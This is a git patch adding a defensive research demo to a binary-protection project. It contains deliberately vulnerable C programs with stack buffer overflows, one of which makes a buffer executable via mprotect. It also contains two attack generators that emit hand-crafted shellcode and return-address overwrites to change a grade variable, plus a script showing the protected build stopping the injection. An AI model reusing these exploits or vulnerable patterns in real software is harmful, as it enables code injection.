From 5967f3a19dea561edb1f3cc9c25a081f8c8b6e83 Mon Sep 17 00:00:00 2001
From: mc2zk <mc2zk@git.zephyr-software.com>
Date: Tue, 11 Jan 2011 22:59:01 +0000
Subject: [PATCH] Adding demos directory to peasoup_examples. badA.txt and
badB.txt are example bad inputs generated from running the attack generators:
attack-gradeA.no_strata and attack-gradeB.no_strata
---
.gitattributes | 10 ++
demos/demo.jan_21_2011/Makefile | 15 +++
demos/demo.jan_21_2011/dumbledore.c | 47 ++++++++
.../dumbledore.exploits/Makefile | 21 ++++
.../attack-gradeA.no_strata.c | 58 ++++++++++
.../attack-gradeB.no_strata.c | 47 ++++++++
.../dumbledore.exploits/badA.txt | Bin 0 -> 131 bytes
.../dumbledore.exploits/badB.txt | Bin 0 -> 135 bytes
.../dumbledore.good_inputs/good.txt | 1 +
demos/demo.jan_21_2011/dumbledore_cmd.c | 44 ++++++++
demos/demo.jan_21_2011/ps_demo.sh | 104 ++++++++++++++++++
examples/dumbledore.c | 2 +
examples/dumbledore_cmd.c | 2 -
tools/ps_run.sh | 2 +-
14 files changed, 350 insertions(+), 3 deletions(-)
create mode 100644 demos/demo.jan_21_2011/Makefile
create mode 100644 demos/demo.jan_21_2011/dumbledore.c
create mode 100644 demos/demo.jan_21_2011/dumbledore.exploits/Makefile
create mode 100755 demos/demo.jan_21_2011/dumbledore.exploits/attack-gradeA.no_strata.c
create mode 100644 demos/demo.jan_21_2011/dumbledore.exploits/attack-gradeB.no_strata.c
create mode 100644 demos/demo.jan_21_2011/dumbledore.exploits/badA.txt
create mode 100644 demos/demo.jan_21_2011/dumbledore.exploits/badB.txt
create mode 100644 demos/demo.jan_21_2011/dumbledore.good_inputs/good.txt
create mode 100644 demos/demo.jan_21_2011/dumbledore_cmd.c
create mode 100755 demos/demo.jan_21_2011/ps_demo.sh
diff --git a/.gitattributes b/.gitattributes
index 7f26ed590..240f443eb 100644
--- a/.gitattributes
+++ b/.gitattributes
@@ -2,6 +2,16 @@
/Makefile -text
chopzero_src/Makefile -text
chopzero_src/chopzero.c -text
+demos/demo.jan_21_2011/Makefile -text
+demos/demo.jan_21_2011/dumbledore.c -text
+demos/demo.jan_21_2011/dumbledore.exploits/Makefile -text
+demos/demo.jan_21_2011/dumbledore.exploits/attack-gradeA.no_strata.c -text
+demos/demo.jan_21_2011/dumbledore.exploits/attack-gradeB.no_strata.c -text
+demos/demo.jan_21_2011/dumbledore.exploits/badA.txt -text
+demos/demo.jan_21_2011/dumbledore.exploits/badB.txt -text
+demos/demo.jan_21_2011/dumbledore.good_inputs/good.txt -text
+demos/demo.jan_21_2011/dumbledore_cmd.c -text
+demos/demo.jan_21_2011/ps_demo.sh -text
examples/Makefile -text
examples/block_copy.c -text
examples/cmd_args_005.c -text
diff --git a/demos/demo.jan_21_2011/Makefile b/demos/demo.jan_21_2011/Makefile
new file mode 100644
index 000000000..dc4d6502c
--- /dev/null
+++ b/demos/demo.jan_21_2011/Makefile
@@ -0,0 +1,15 @@
+TOOLBASE=${PEASOUP_HOME}/tools
+
+all: dumbledore.original dumbledore_cmd.original
+
+dumbledore.original: dumbledore.o
+ ${TOOLBASE}/ps_link.sh dumbledore.o -o dumbledore.original
+
+dumbledore_cmd.original: dumbledore_cmd.o
+ ${TOOLBASE}/ps_link.sh dumbledore_cmd.o -o dumbledore_cmd.original
+
+.c.o:
+ ${TOOLBASE}/ps_comp.sh $<
+
+clean:
+ rm *.o dumbledore.original dumbledore_cmd.original dumbledore.protected dumbledore_cmd.protected
diff --git a/demos/demo.jan_21_2011/dumbledore.c b/demos/demo.jan_21_2011/dumbledore.c
new file mode 100644
index 000000000..02e2f05c1
--- /dev/null
+++ b/demos/demo.jan_21_2011/dumbledore.c
@@ -0,0 +1,47 @@
+
+#include <stdio.h>
+#include <sys/mman.h>
+#include <string.h>
+#include <stdlib.h>
+
+enum {BUFSIZE = 98};
+
+char grade = 'D';
+char Name[BUFSIZE];
+FILE *f;
+
+void readString(char *s) {
+ char buf[BUFSIZE];
+ int i = 0;
+ int c;
+
+ for (;;)
+ {
+ c = getchar();
+ if ((c == EOF) || (c == '\n'))
+ break;
+ buf[i] = c;
+ i++;
+ }
+ buf[i] = '\0';
+
+ for (i = 0; i < BUFSIZE; i++)
+ s[i] = buf[i];
+}
+
+
+int main(void)
+{
+ mprotect((void*)((unsigned int)Name & 0xfffff000), 1,
+ PROT_READ | PROT_WRITE | PROT_EXEC);
+ readString(Name);
+
+ if (strcmp(Name, "Wizard in Training") == 0)
+ grade = 'B';
+
+ printf("Thank you, %s.\n", Name);
+ printf("I recommend that you get a grade of %c on this assignment.\n", grade);
+
+ exit(0);
+}
+
diff --git a/demos/demo.jan_21_2011/dumbledore.exploits/Makefile b/demos/demo.jan_21_2011/dumbledore.exploits/Makefile
new file mode 100644
index 000000000..e0974acf9
--- /dev/null
+++ b/demos/demo.jan_21_2011/dumbledore.exploits/Makefile
@@ -0,0 +1,21 @@
+# This file contains rules to build attack generators for the dumbledore example
+# which uses file input.
+# attack-gradeXXX.no_strata is the attack generator for a non-stratafied
+# application
+# The attack generator for stratafied application may need
+# to be slightly different
+PS_TOOLBASE=../../tools
+
+all: attack-gradeA attack-gradeB
+
+attack-gradeA.no_strata: attack-gradeA.no_strata.o
+ ${PS_TOOLBASE}/ps_link.sh attack-gradeA.no_strata.o -o gradeA.no_strata
+
+attack-gradeB.no_strata: attack-gradeB.no_strata.o
+ ${PS_TOOLBASE}/ps_link.sh attack-gradeB.no_strata.o -o gradeB.no_strata
+
+.c.o:
+ ${PS_TOOLBASE}/ps_comp.sh $<
+
+clean:
+ rm gradeA.no_strata gradeB.no_strata *.o
diff --git a/demos/demo.jan_21_2011/dumbledore.exploits/attack-gradeA.no_strata.c b/demos/demo.jan_21_2011/dumbledore.exploits/attack-gradeA.no_strata.c
new file mode 100755
index 000000000..097546fa8
--- /dev/null
+++ b/demos/demo.jan_21_2011/dumbledore.exploits/attack-gradeA.no_strata.c
@@ -0,0 +1,58 @@
+#include <stdio.h>
+#include <string.h>
+ /* stack location address */
+char attackString[] =
+ "Ja" /* 0xbfffefa6 */ /* Name: 0x80c80c0 */
+ "ck D" /* 0xbfffefa8 */ /* Name: 0x80c80c2 */
+ "avid" /* 0xbfffefac */ /* Name: 0x80c80c6 */
+ "son\x00" /* 0xbfffefb0 */ /* Name: 0x80c80ca */
+ "\xc6\x05\x08\x60" /* 0xbfffefb4 */ /* Name: 0x80c80ce */ /* movb $0x41,0x080c6008 addr of grade */
+ "\x0c\x08\x41\x90" /* 0xbfffefb8 */ /* nop is \x90 */
+ "\x68\xf7\x82\x04" /* 0xbfffefbc */ /* op 68 is push ret addr 0x080482f7 */
+ "\x08\x90\xc3\x3e" /* 0xbfffefc0 */ /* nop is \x90; c3 is ret inst */
+ "\x20\x20\x20\x20" /* 0xbfffefc4 */
+ "\x20\x20\x20\x20" /* 0xbfffefc8 */
+ "\x20\x20\x20\x20" /* 0xbfffefcc */
+ "\x20\x20\x20\x20" /* 0xbfffefd0 */
+ "\x20\x20\x20\x20" /* 0xbfffefd4 */
+ "\x20\x20\x20\x20" /* 0xbfffefd8 */
+ "\x20\x20\x20\x20" /* 0xbfffefdc */
+ "\x20\x20\x20\x20" /* 0xbfffefe0 */
+ "\x20\x20\x20\x20" /* 0xbfffefe4 */
+ "\x20\x20\x20\x20" /* 0xbfffefe8 */
+ "\x20\x20\x20\x20" /* 0xbfffefec */
+ "\x20\x20\x20\x20" /* 0xbfffeff0 */
+ "\x20\x20\x20\x20" /* 0xbfffeff4 */
+ "\x20\x20\x20\x20" /* 0xbfffeff8 */
+ "\x20\x20\x20\x20" /* 0xbfffeffc */
+ "\x20\x20\x20\x20" /* 0xbffff000 */
+ "\x20\x20\x20\x20" /* 0xbffff004 */
+ "\x62\x00\x00\x00" /* 0xbffff008 */ /* i here */
+ "\x20\x20\x20\x20" /* 0xbffff00c */ /* c here */
+ "\x20\x20\x20\x20" /* 0xbffff010 */
+ "\x20\x20\x20\x20" /* 0xbffff014 */
+ "\x38\xf0\xff\xbf" /* 0xbffff018 */ /* ebp aka frame ptr */
+ "\xce\x80\x0c\x08" /* 0xbffff01c */ /* return address should b
+ the addr of Name
+ where injection code is
+ 0x80c80ce */
+ "\xc0\x80\x0c\x08" /* 0xbffff020 */ /* address of Name */
+ "\x0a\x0a\x0a\x0a" ; /* 0xbffff024 */
+/* The key to the attack is to change the return address (located on the
+ stack at address 0x22cc7c as indicated in the above picture to
+ point to the code location in main where the grade is set to a "B".
+ However, it is also important for the buffer overrun to preserve the
+ frame pointer and the address of grade on the stack (grade is passed and s
+ points to it
+*/
+
+
+int main() {
+ int i;
+ char *p = attackString;
+ for (i = 0; i < sizeof(attackString); i++) {
+ putchar(*p);
+ p++;
+ }
+ return 1;
+}
diff --git a/demos/demo.jan_21_2011/dumbledore.exploits/attack-gradeB.no_strata.c b/demos/demo.jan_21_2011/dumbledore.exploits/attack-gradeB.no_strata.c
new file mode 100644
index 000000000..799646630
--- /dev/null
+++ b/demos/demo.jan_21_2011/dumbledore.exploits/attack-gradeB.no_strata.c
@@ -0,0 +1,47 @@
+#include <stdio.h>
+#include <string.h>
+ /* stack location address */
+char attackString[] = "Ja" /* 0x0bfffefa6 */
+ "ck D" /* 0x0bfffefa8 */
+ "avid" /* 0x0bfffefac */
+ "son\x00" /* 0x0bfffefb0 */
+ "\xc6\x05\x20\x20" /* 0x0bfffefb4 */
+ "\x40\x20\x41\x90" /* 0x0bfffefb8 */
+ "\x68\x33\x11\x40" /* 0x0bfffefbc */
+ "\x00\x90\xc3\x3e" /* 0x0bfffefc0 */
+ "\x20\x20\x20\x20" /* 0x0bfffefc4 */
+ "\x20\x20\x20\x20" /* 0x0bfffefc8 */
+ "\x20\x20\x20\x20" /* 0x0bfffefcc */
+ "\x20\x20\x20\x20" /* 0x0bfffefd0 */
+ "\x20\x20\x20\x20" /* 0x0bfffefd4 */
+ "\x20\x20\x20\x20" /* 0x0bfffefd8 */
+ "\x20\x20\x20\x20" /* 0x0bfffefdc */
+ "\x20\x20\x20\x20" /* 0x0bfffefe0 */
+ "\x20\x20\x20\x20" /* 0x0bfffefe4 */
+ "\x20\x20\x20\x20" /* 0x0bfffefe8 */
+ "\x20\x20\x20\x20" /* 0x0bfffefec */
+ "\x20\x20\x20\x20" /* 0x0bfffeff0 */
+ "\x20\x20\x20\x20" /* 0x0bfffeff4 */
+ "\x20\x20\x20\x20" /* 0x0bfffeff8 */
+ "\x20\x20\x20\x20" /* 0x0bfffeffc */
+ "\x20\x20\x20\x20" /* 0x0bffff000 */
+ "\x20\x20\x20\x20" /* 0x0bffff004 */
+ "\x62\x00\x00\x00" /* 0x0bffff008 */ /* i here */
+ "\x20\x20\x20\x20" /* 0x0bffff00c */ /* c here */
+ "\x20\x20\x20\x20" /* 0x0bffff010 */
+ "\x20\x20\x20\x20" /* 0x0bffff014 */
+ "\x38\xf0\xff\xbf" /* 0x0bffff018 */ /* ebp */
+ "\xfd\x82\x04\x08" /* 0x0bffff01c */ /* return addr */
+ "\xc0\x80\x0c\x08" /* 0x0bffff020 */ /* addr Name */
+ "\x0a\x0a\x0a\x0a" /* 0x0bffff024 */
+ "\x0a\x0a\x0a\x0a"; /* 0x0bffff028 */
+int main() {
+ int i;
+ char *p = attackString;
+ for (i = 0; i < sizeof(attackString); i++) {
+ putchar(*p);
+ p++;
+ }
+ return 1;
+}
+
diff --git a/demos/demo.jan_21_2011/dumbledore.exploits/badA.txt b/demos/demo.jan_21_2011/dumbledore.exploits/badA.txt
new file mode 100644
index 0000000000000000000000000000000000000000..2103f665448a25c644bb81f462b2bcc0a490453c
GIT binary patch
literal 131
zcmeZDOwLwtNi54uDbCMhIL6A6z{BA<A>(@!3&(`Rb_!GgNem1O$i`TF_`m;L0}sam
JAm#!B1^{m(8jb(}
literal 0
HcmV?d00001
diff --git a/demos/demo.jan_21_2011/dumbledore.exploits/badB.txt b/demos/demo.jan_21_2011/dumbledore.exploits/badB.txt
new file mode 100644
index 0000000000000000000000000000000000000000..c3520ece5ad8b805d5f40c78ee09bfd1c0f002e1
GIT binary patch
literal 135
zcmeZDOwLwtNi54uDbCMhIL4}=;Gp0*A;VbEfnma7I|V9$BnAcsWMeEo{NMk#iG|}p
L0}lrm6fgh)e482q
literal 0
HcmV?d00001
diff --git a/demos/demo.jan_21_2011/dumbledore.good_inputs/good.txt b/demos/demo.jan_21_2011/dumbledore.good_inputs/good.txt
new file mode 100644
index 000000000..eeae9c63e
--- /dev/null
+++ b/demos/demo.jan_21_2011/dumbledore.good_inputs/good.txt
@@ -0,0 +1 @@
+Jack Davidson
diff --git a/demos/demo.jan_21_2011/dumbledore_cmd.c b/demos/demo.jan_21_2011/dumbledore_cmd.c
new file mode 100644
index 000000000..7aff3c7e9
--- /dev/null
+++ b/demos/demo.jan_21_2011/dumbledore_cmd.c
@@ -0,0 +1,44 @@
+#include <stdio.h>
+#include <sys/mman.h>
+#include <string.h>
+#include <stdlib.h>
+
+enum {BUFSIZE = 24};
+
+char grade = 'D';
+char Name[BUFSIZE];
+
+void readString(char *in, char *s) {
+ char buf[BUFSIZE];
+ int i = 0;
+ int c;
+
+ for (;;)
+ {
+ c = in[i];
+ if ((c == '\0') || (c == '\n'))
+ break;
+
+ buf[i] = c;
+ i++;
+ }
+ buf[i] = '\0';
+
+ for (i = 0; i < BUFSIZE; i++)
+ s[i] = buf[i];
+}
+
+
+int main(int argc, char * argv[])
+{
+ if (argc == 2)
+ readString(argv[1], Name);
+
+ if (strcmp(Name, "Wizard in Training") == 0)
+ grade = 'B';
+
+ printf("Thank you, %s.\n", Name);
+ printf("I recommend that you get a grade of %c on this assignment.\n", grade);
+
+ return 0;
+}
diff --git a/demos/demo.jan_21_2011/ps_demo.sh b/demos/demo.jan_21_2011/ps_demo.sh
new file mode 100755
index 000000000..8ae7fddd3
--- /dev/null
+++ b/demos/demo.jan_21_2011/ps_demo.sh
@@ -0,0 +1,104 @@
+#!/bin/sh
+
+if [ "${PEASOUP_HOME}x" = "x" ]; then
+ echo "environment variable: PEASOUP_HOME is empty."
+ echo "PEASOUP_HOME must be defined to point at a valid peasoup_examples directory"
+ exit 1
+fi
+
+TOOLBASE=${PEASOUP_HOME}/tools
+
+# A pause function
+Pause()
+{
+ key=""
+ echo -n "\nPress any key to continue...\n"
+ echo
+ stty -icanon
+ key=`dd count=1 2>/dev/null`
+ stty icanon
+}
+
+# N.B. - Assumes that dumbledore.original has already been built.
+# clear the screen
+clear
+# 1) Run dumbledore_cmd.original with good input
+echo "Running dumbledore.original with a good input\n"
+good_input=`cat dumbledore.good_inputs/good.txt`
+echo "Input: ${good_input}\n"
+
+echo "./dumbledore.original < dumbledore.good_inputs/good.txt\n"
+
+Pause
+
+./dumbledore.original < dumbledore.good_inputs/good.txt
+
+Pause
+
+# clear the screen
+clear
+
+# 2) Run dumbledore_cmd.original with a bad input that PEASOUP can catch
+# input is too long and overwrites return address and base pointer
+
+echo "Running dumbledore.original with a bad input which performs code injection. \n"
+
+bad_input=`cat dumbledore.exploits/badA.txt`
+echo "Input: ${bad_input}\n"
+echo "./dumbledore.original < dumbledore.exploits/badA.txt\n"
+
+Pause
+
+./dumbledore.original < dumbledore.exploits/badA.txt
+
+Pause
+
+# 3) Run ps_analyze.sh dumbledore_cmd.original dumbledore_cmd.protected
+# Point out IDA pass
+# Point out GraCE run
+
+# clear the screen
+clear
+echo "Running PEASOUP analysis phase...\n"
+echo "${TOOLBASE}/ps_analyze.sh dumbledore.original dumbledore.protected\n"
+
+Pause
+
+${TOOLBASE}/ps_analyze.sh dumbledore.original dumbledore.protected
+
+Pause
+
+# clear the screen
+clear
+
+# 4) Run dumbledore.protected on good input
+echo "Running dumbledore.protected on good input\n"
+echo "Input: ${good_input}\n"
+echo "./dumbledore.protected < dumbledore.good_inputs/good.txt\n"
+
+Pause
+
+./dumbledore.protected < dumbledore.good_inputs/good.txt
+
+Pause
+
+# clear the screen
+clear
+# 5) Run dumbledore.protected on bad input A, show defeat of exploit
+echo "Running dumbledore.protected on bad input which performs code injection\n"
+
+input=`cat dumbledore.exploits/badA.txt`
+echo "Input: ${bad_input}\n"
+echo "./dumbledore.protected < dumbledore.exploits/badA.txt\n"
+
+Pause
+
+./dumbledore.protected < dumbledore.exploits/badA.txt
+
+Pause
+
+echo "GDB step through...."
+# 6) Demonstrate add_pc_confinement.sh
+# 7) Run dumbledore.protected in gdb with bad input with bp set at confined_targ_fetch(), fetching a good instruction, and show it when catching the bad instruction.
+# 8) Run dumbledore.protected on bad input #2, show that we did not defeat the exploit
+
diff --git a/examples/dumbledore.c b/examples/dumbledore.c
index 39951a5b7..02e2f05c1 100644
--- a/examples/dumbledore.c
+++ b/examples/dumbledore.c
@@ -32,6 +32,8 @@ void readString(char *s) {
int main(void)
{
+ mprotect((void*)((unsigned int)Name & 0xfffff000), 1,
+ PROT_READ | PROT_WRITE | PROT_EXEC);
readString(Name);
if (strcmp(Name, "Wizard in Training") == 0)
diff --git a/examples/dumbledore_cmd.c b/examples/dumbledore_cmd.c
index 8b9ddd611..7aff3c7e9 100644
--- a/examples/dumbledore_cmd.c
+++ b/examples/dumbledore_cmd.c
@@ -42,5 +42,3 @@ int main(int argc, char * argv[])
return 0;
}
-
-
diff --git a/tools/ps_run.sh b/tools/ps_run.sh
index 2239153da..d10b42bbb 100755
--- a/tools/ps_run.sh
+++ b/tools/ps_run.sh
@@ -3,6 +3,6 @@
datapath=$1
shift;
-STRATA_ANNOT_FILE=$datapath/a.ncexe.annot STRATA_PC_CONFINE=0 $datapath/a.stratafied $*
+STRATA_ANNOT_FILE=$datapath/a.ncexe.annot STRATA_PC_CONFINE=1 $datapath/a.stratafied $*
--
GitLab